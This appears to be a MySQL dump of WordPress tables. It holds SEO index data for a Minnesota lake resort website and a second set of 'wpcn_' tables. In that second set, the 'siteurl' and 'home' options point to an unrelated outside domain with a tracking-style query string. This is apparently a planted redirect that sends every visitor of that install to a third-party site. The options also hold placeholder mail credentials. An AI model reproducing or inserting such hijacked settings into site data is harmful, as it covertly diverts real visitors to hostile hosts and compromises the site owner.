16:41:19',1,NULL,NULL,NULL,NULL,0),(23,NULL,NULL,84,'post','page',1,0,NULL,NULL,'Hunting','publish',NULL,0,NULL,NULL,NULL,'hunting, Lake Christina',28,90,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/leonturkey02-1024x768.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/leonturkey02-1024x768.jpg',NULL,'first-content-image',NULL,0,0,NULL,'2020-05-11 01:47:59','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(24,NULL,NULL,NULL,'system-page','search-result',NULL,NULL,'You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%',NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-05-11 06:32:31','2020-08-06 05:22:32',1,NULL,NULL,NULL,NULL,0),(25,NULL,NULL,1,'post','post',1,0,NULL,NULL,'Hello world!','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-05-11 19:40:36','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(26,NULL,NULL,3,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/6717a55e40ee8e9e998f7c7405263e48?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/6717a55e40ee8e9e998f7c7405263e48?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-05-13 00:39:33','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(28,'https://ashbyresort.com/?post_type=tablepress_table&p=835','57:70e7ba0972c88834c8f4916a862aadbe',835,'post','tablepress_table',1,0,NULL,NULL,'Booking Calendar','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-05-13 00:40:38','2020-08-25 16:20:50',1,NULL,NULL,NULL,NULL,0),(29,NULL,NULL,732,'post','page',1,0,NULL,NULL,'Test Page','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/plugins/elementor/assets/images/placeholder.png',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/plugins/elementor/assets/images/placeholder.png',NULL,'first-content-image',NULL,1,0,NULL,'2020-05-13 02:25:27','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(30,NULL,NULL,1,'term','category',NULL,NULL,NULL,NULL,'Uncategorized',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-05-14 16:36:35','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(31,NULL,NULL,254,'post','attachment',2,0,NULL,NULL,'DSCN3872','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3872.jpg',NULL,'254','attachment-image',NULL,NULL,'https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3872-1024x768.jpg','254','attachment-image','{\"width\":1024,\"height\":768,\"path\":\"2016\\/03\\/DSCN3872-1024x768.jpg\",\"url\":\"https:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3872-1024x768.jpg\",\"size\":\"large\",\"id\":254,\"alt\":\"\",\"pixels\":786432,\"type\":\"image\\/jpeg\"}',NULL,NULL,NULL,'2020-06-15 14:19:40','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(33,NULL,NULL,948,'post','post',1,0,NULL,NULL,'Auto Draft','auto-draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-20 16:03:56','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(34,NULL,NULL,949,'post','post',3,0,NULL,NULL,'Auto Draft','auto-draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-07-02 10:49:44','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(35,'https://ashbyresort.com/?post_type=tablepress_table&p=692','57:1c684429076a14d6fc272f1a9e2ddc95',692,'post','tablepress_table',1,0,NULL,NULL,'Equipment Rentals','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-07-02 10:53:33','2020-07-25 05:57:56',1,NULL,NULL,NULL,NULL,0),(36,'https://ashbyresort.com/','24:c92ad59f470e224b6f43e51208803c21',NULL,'home-page',NULL,NULL,NULL,'%%sitename%% %%page%% %%sep%% %%sitedesc%%','On Pelican Lake in Minnesota','Home',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,'','','','',NULL,NULL,NULL,NULL,NULL,'2020-10-30 18:33:32','2020-11-16 21:41:35',1,NULL,NULL,NULL,NULL,0);
/*!40000 ALTER TABLE `ar_yoast_indexable` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_yoast_indexable_hierarchy`
--

DROP TABLE IF EXISTS `ar_yoast_indexable_hierarchy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_yoast_indexable_hierarchy` (
  `indexable_id` int(11) unsigned NOT NULL,
  `ancestor_id` int(11) unsigned NOT NULL,
  `depth` int(11) unsigned DEFAULT NULL,
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  PRIMARY KEY (`indexable_id`,`ancestor_id`),
  KEY `indexable_id` (`indexable_id`),
  KEY `ancestor_id` (`ancestor_id`),
  KEY `depth` (`depth`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_yoast_indexable_hierarchy`
--

LOCK TABLES `ar_yoast_indexable_hierarchy` WRITE;
/*!40000 ALTER TABLE `ar_yoast_indexable_hierarchy` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_yoast_indexable_hierarchy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_yoast_migrations`
--

DROP TABLE IF EXISTS `ar_yoast_migrations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_yoast_migrations` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `version` varchar(191) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_ar_yoast_migrations_version` (`version`)
) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_yoast_migrations`
--

LOCK TABLES `ar_yoast_migrations` WRITE;
/*!40000 ALTER TABLE `ar_yoast_migrations` DISABLE KEYS */;
INSERT INTO `ar_yoast_migrations` VALUES (1,'20171228151840'),(2,'20171228151841'),(3,'20190529075038'),(4,'20191011111109'),(5,'20200408101900'),(6,'20200420073606'),(7,'20200428123747'),(8,'20200428194858'),(9,'20200429105310'),(10,'20200430075614'),(11,'20200430150130'),(12,'20200507054848'),(13,'20200513133401'),(14,'20200609154515'),(15,'20200616130143'),(16,'20200702141921'),(17,'20200728095334'),(18,'20200617122511');
/*!40000 ALTER TABLE `ar_yoast_migrations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_yoast_primary_term`
--

DROP TABLE IF EXISTS `ar_yoast_primary_term`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_yoast_primary_term` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` int(11) unsigned NOT NULL,
  `term_id` int(11) unsigned NOT NULL,
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `post_taxonomy` (`post_id`,`taxonomy`),
  KEY `post_term` (`post_id`,`term_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_yoast_primary_term`
--

LOCK TABLES `ar_yoast_primary_term` WRITE;
/*!40000 ALTER TABLE `ar_yoast_primary_term` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_yoast_primary_term` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_yoast_seo_links`
--

DROP TABLE IF EXISTS `ar_yoast_seo_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_yoast_seo_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_id` bigint(20) unsigned NOT NULL,
  `target_post_id` bigint(20) unsigned NOT NULL,
  `type` varchar(8) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `indexable_id` int(11) unsigned DEFAULT NULL,
  `target_indexable_id` int(11) unsigned DEFAULT NULL,
  `height` int(11) unsigned DEFAULT NULL,
  `width` int(11) unsigned DEFAULT NULL,
  `size` int(11) unsigned DEFAULT NULL,
  `language` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `region` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`),
  KEY `indexable_link_direction` (`indexable_id`,`type`)
) ENGINE=MyISAM AUTO_INCREMENT=267 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_yoast_seo_links`
--

LOCK TABLES `ar_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `ar_yoast_seo_links` DISABLE KEYS */;
INSERT INTO `ar_yoast_seo_links` VALUES (263,'http://ashbyresort.com/calendar/',52,88,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(200,'http://ashbyresort.com/calendar/',92,88,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(132,'http://centrallakestrail.com',64,0,'external',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(266,'http://ashbyresort.com/calendar/',633,88,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(126,'http://ashbyresort.com/calendar/',46,88,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(123,'http://ashbyresort.com/campgrounds/',37,633,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(122,'http://ashbyresort.com/large-cabins/',37,52,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(121,'http://ashbyresort.com/cabins/',37,49,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(120,'http://ashbyresort.com/motel/',37,46,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(119,'http://ashbyresort.com/campgrounds/',37,633,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(118,'http://ashbyresort.com/large-cabins/',37,52,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(117,'http://ashbyresort.com/cabins/',37,49,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(116,'http://ashbyresort.com/motel/',37,46,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(89,'#',732,0,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(260,'http://ashbyresort.com/campground-map/',789,31,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(259,'http://ashbyresort.com/calendar/',789,88,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(221,'https://wpbookingcalendar.com',88,0,'external',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(239,'http://ashbyresort.com/calendar/',837,88,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL);
/*!40000 ALTER TABLE `ar_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_yoast_seo_meta`
--

DROP TABLE IF EXISTS `ar_yoast_seo_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_yoast_seo_meta` (
  `object_id` bigint(20) unsigned NOT NULL,
  `internal_link_count` int(10) unsigned DEFAULT NULL,
  `incoming_link_count` int(10) unsigned DEFAULT NULL,
  UNIQUE KEY `object_id` (`object_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_yoast_seo_meta`
--

LOCK TABLES `ar_yoast_seo_meta` WRITE;
/*!40000 ALTER TABLE `ar_yoast_seo_meta` DISABLE KEYS */;
INSERT INTO `ar_yoast_seo_meta` VALUES (587,0,0),(588,0,0),(428,0,0),(589,0,0),(563,0,0),(88,0,6),(43,0,0),(598,0,0),(590,0,0),(565,0,0),(568,0,0),(570,0,0),(571,0,0),(573,0,0),(574,0,0),(580,0,0),(581,0,0),(586,0,0),(564,0,0),(600,0,0),(46,1,2),(52,1,2),(92,1,0),(55,0,0),(469,0,0),(455,0,0),(49,0,2),(31,0,1),(610,0,0),(611,0,0),(198,0,0),(612,0,0),(140,0,0),(64,0,0),(473,0,0),(79,0,0),(620,0,0),(625,0,0),(633,1,2),(56,0,0),(635,0,0),(640,0,0),(641,0,0),(67,0,0),(655,0,0),(37,8,0),(12,0,0),(661,0,0),(664,0,0),(673,0,0),(678,0,0),(660,0,0),(676,0,0),(677,0,0),(57,0,0),(80,0,0),(127,0,0),(155,0,0),(242,0,0),(260,0,0),(261,0,0),(274,0,0),(398,0,0),(544,0,0),(545,0,0),(604,0,0),(605,0,0),(617,0,0),(618,0,0),(619,0,0),(621,0,0),(622,0,0),(623,0,0),(624,0,0),(626,0,0),(627,0,0),(628,0,0),(629,0,0),(630,0,0),(631,0,0),(632,0,0),(699,0,0),(61,0,0),(700,0,0),(432,0,0),(698,0,0),(666,0,0),(667,0,0),(665,0,0),(663,0,0),(662,0,0),(675,0,0),(674,0,0),(704,0,0),(705,0,0),(706,0,0),(707,0,0),(708,0,0),(709,0,0),(712,0,0),(713,0,0),(2,0,0),(719,0,0),(58,0,0),(133,0,0),(732,1,0),(401,0,0),(606,0,0),(741,0,0),(710,0,0),(637,0,0),(752,0,0),(59,0,0),(750,0,0),(726,0,0),(521,0,0),(766,0,0),(40,0,0),(131,0,0),(373,0,0),(183,0,0),(772,0,0),(480,0,0),(730,0,0),(149,0,0),(376,0,0),(786,0,0),(789,2,0),(50,0,0),(787,0,0),(81,0,0),(84,0,0),(728,0,0),(796,0,0),(800,0,0),(435,0,0),(476,0,0),(803,0,0),(107,0,0),(805,0,0),(733,0,0),(729,0,0),(807,0,0),(810,0,0),(811,0,0),(814,0,0),(96,0,0),(158,0,0),(837,1,0),(823,0,0),(838,0,0),(845,0,0),(854,0,0),(268,0,0),(24,0,0),(179,0,0),(277,0,0),(296,0,0),(312,0,0),(364,0,0),(367,0,0),(369,0,0),(368,0,0),(488,0,0),(905,0,0),(60,0,0),(87,0,0),(134,0,0),(224,0,0),(234,0,0),(235,0,0),(275,0,0),(400,0,0),(731,0,0),(737,0,0),(745,0,0),(747,0,0),(748,0,0),(749,0,0),(751,0,0),(788,0,0),(51,0,0),(73,0,0),(120,0,0),(126,0,0),(150,0,0),(154,0,0),(318,0,0),(319,0,0),(320,0,0),(321,0,0),(322,0,0),(323,0,0),(325,0,0),(326,0,0),(327,0,0),(328,0,0),(329,0,0),(330,0,0),(331,0,0),(332,0,0),(377,0,0),(395,0,0),(396,0,0),(397,0,0),(608,0,0),(609,0,0),(648,0,0),(649,0,0),(650,0,0),(651,0,0),(652,0,0),(653,0,0),(654,0,0),(740,0,0),(784,0,0),(785,0,0),(824,0,0),(825,0,0),(812,0,0),(813,0,0),(882,0,0),(942,0,0),(943,0,0),(946,0,0);
/*!40000 ALTER TABLE `ar_yoast_seo_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_commentmeta`
--

DROP TABLE IF EXISTS `wpcn_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_commentmeta`
--

LOCK TABLES `wpcn_commentmeta` WRITE;
/*!40000 ALTER TABLE `wpcn_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcn_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_comments`
--

DROP TABLE IF EXISTS `wpcn_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_comments`
--

LOCK TABLES `wpcn_comments` WRITE;
/*!40000 ALTER TABLE `wpcn_comments` DISABLE KEYS */;
INSERT INTO `wpcn_comments` VALUES (1,1,'A WordPress Commenter','wapuu@wordpress.example','https://wordpress.org/','','2018-03-07 00:41:39','2018-03-07 00:41:39','Hi, this is a comment.\nTo get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.\nCommenter avatars come from <a href=\"https://gravatar.com\">Gravatar</a>.',0,'1','','',0,0);
/*!40000 ALTER TABLE `wpcn_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_links`
--

DROP TABLE IF EXISTS `wpcn_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_links`
--

LOCK TABLES `wpcn_links` WRITE;
/*!40000 ALTER TABLE `wpcn_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcn_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_options`
--

DROP TABLE IF EXISTS `wpcn_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=MyISAM AUTO_INCREMENT=153 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_options`
--

LOCK TABLES `wpcn_options` WRITE;
/*!40000 ALTER TABLE `wpcn_options` DISABLE KEYS */;
INSERT INTO `wpcn_options` VALUES (1,'siteurl','https://cht.secondaryinformtrand.com/det.php?sit=flex&sid=3&yuid=1&','yes'),(2,'home','https://cht.secondaryinformtrand.com/det.php?sit=flex&sid=2&yuid=1&','yes'),(3,'blogname','My Blog','yes'),(4,'blogdescription','My WordPress Blog','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','dbc@expcom.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(29,'rewrite_rules','a:90:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$